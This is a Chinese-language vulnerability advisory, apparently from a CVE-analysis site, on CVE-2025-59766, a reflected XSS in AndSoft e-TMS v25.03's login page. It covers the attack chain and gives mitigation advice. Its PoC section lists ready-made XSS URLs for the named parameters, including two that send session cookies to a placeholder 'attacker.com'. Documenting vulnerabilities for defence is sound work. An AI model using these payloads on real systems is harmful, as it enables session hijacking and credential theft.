CVE-2025-59766：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59766

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59766是AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1评分为6.1分，属于中危级别。

e-TMS是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、物流跟踪等业务。该漏洞存在于系统的登录页面'/clt/LOGINFRM_LT.ASP'中，涉及多个参数未经过充分的输入验证和输出编码，包括'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'等参数。攻击者可以通过构造包含恶意JavaScript代码的URL，诱使受害者点击该链接，从而在受害者的浏览器上下文中执行任意JavaScript代码。

由于该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明攻击者无需认证即可通过网络发起攻击，但需要用户交互（如点击恶意链接）才能触发漏洞利用。攻击成功后，攻击者可以窃取用户的会话Cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作，对系统的机密性和完整性造成低级别影响。

该漏洞的发现和披露由INCIBE（西班牙国家网络安全研究所）协调完成，INCIBE在2025年9月24日发布了关于AndSoft e-TMS多个漏洞的安全公告，建议用户及时关注厂商发布的安全补丁并进行版本更新。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于AndSoft e-TMS v25.03的登录页面'/clt/LOGINFRM_LT.ASP'在处理用户输入参数时，未对输入数据进行充分的过滤、转义或编码处理。

具体而言，漏洞涉及以下六个参数：'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'。当这些参数接收用户提交的输入后，服务器端直接将参数值嵌入到返回的HTML响应中，而没有进行HTML实体编码或白名单过滤。攻击者可以在这些参数中注入恶意的JavaScript代码或HTML标签。

利用方式如下：攻击者首先构造一个包含恶意payload的URL，例如：
https://target.com/clt/LOGINFRM_LT.ASP?l=<script>alert(document.cookie)</script>
或者使用更隐蔽的payload，如事件处理器：
https://target.com/clt/LOGINFRM_LT.ASP?demo=<img src=x onerror=alert(document.cookie)>

然后通过钓鱼邮件、社交工程或其他方式诱使受害者点击该链接。当受害者在已登录e-TMS系统的浏览器中点击该链接时，恶意JavaScript代码将在受害者的浏览器上下文中执行，能够访问会话Cookie、读取敏感信息、修改页面DOM内容，甚至代表用户执行操作。

由于漏洞存在于登录页面，攻击者还可以针对未登录的用户发起攻击，窃取后续登录凭证或进行钓鱼欺骗。此外，CVSS向量中包含S:C（Scope Changed），表明攻击影响可能超出受攻击组件的范围，影响到其他安全上下文。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者通过搜索引擎、Shodan等工具识别暴露在互联网上的AndSoft e-TMS v25.03系统实例，并确认目标系统使用存在漏洞的'/clt/LOGINFRM_LT.ASP'登录页面。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript payload的URL，利用'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'或'SuppConn'等未过滤参数注入恶意代码，如窃取Cookie的脚本或重定向代码。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时消息、社交媒体或其他社会工程学手段，将恶意URL发送给e-TMS系统的合法用户，诱使其点击。

STEP 4

步骤4：触发XSS执行

受害者在已登录或可访问e-TMS系统的浏览器中点击恶意链接，浏览器向目标服务器发送请求，服务器将恶意payload原样返回并在浏览器中执行。

STEP 5

步骤5：恶意代码执行与数据窃取

恶意JavaScript代码在受害者浏览器上下文中执行，窃取会话Cookie、敏感信息，或执行钓鱼攻击、会话劫持、权限提升等进一步攻击行为。

STEP 6

步骤6：数据外传与持久化攻击

攻击者通过构造的回调通道（如外部服务器请求）将窃取的数据外传，并可能利用获取的会话凭证进行后续的持久化访问或横向移动攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59766 - AndSoft e-TMS Reflected XSS PoC -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_LT.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic script injection via 'l' parameter -->
https://target.com/clt/LOGINFRM_LT.ASP?l=<script>alert('XSS-CVE-2025-59766')</script>

<!-- PoC 2: Cookie stealing via 'demo' parameter using img onerror event -->
https://target.com/clt/LOGINFRM_LT.ASP?demo=<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">

<!-- PoC 3: SVG-based XSS via 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_LT.ASP?TNTLOGIN=<svg/onload=alert(document.domain)>

<!-- PoC 4: Input tag injection via 'UO' parameter -->
https://target.com/clt/LOGINFRM_LT.ASP?UO="><script>alert('XSS')</script>

<!-- PoC 5: Body onload injection via 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_LT.ASP?SuppConn=<body onload=alert('CVE-2025-59766')>

<!-- PoC 6: Full cookie exfiltration example -->
<!-- Attacker hosts a listener on their server to receive stolen cookies -->
https://target.com/clt/LOGINFRM_LT.ASP?demo2=<script>var i=new Image();i.src="http://attacker.com/log?"+document.cookie;</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对e-TMS系统的外部访问实施访问控制，限制仅授权用户访问登录页面；2）部署Web应用防火墙（WAF）规则，检测和阻断包含常见XSS payload（如<script>标签、onerror事件处理器等）的请求；3）配置浏览器安全策略，在组织内部署内容安全策略（CSP）头；4）对所有会话Cookie启用HttpOnly标志，防止通过XSS窃取会话凭证；5）提高用户安全意识，警惕来自邮件或即时消息的可疑链接，避免点击未经核实的URL；6）监控Web服务器日志，识别异常的参数值和访问模式，及时发现潜在攻击行为。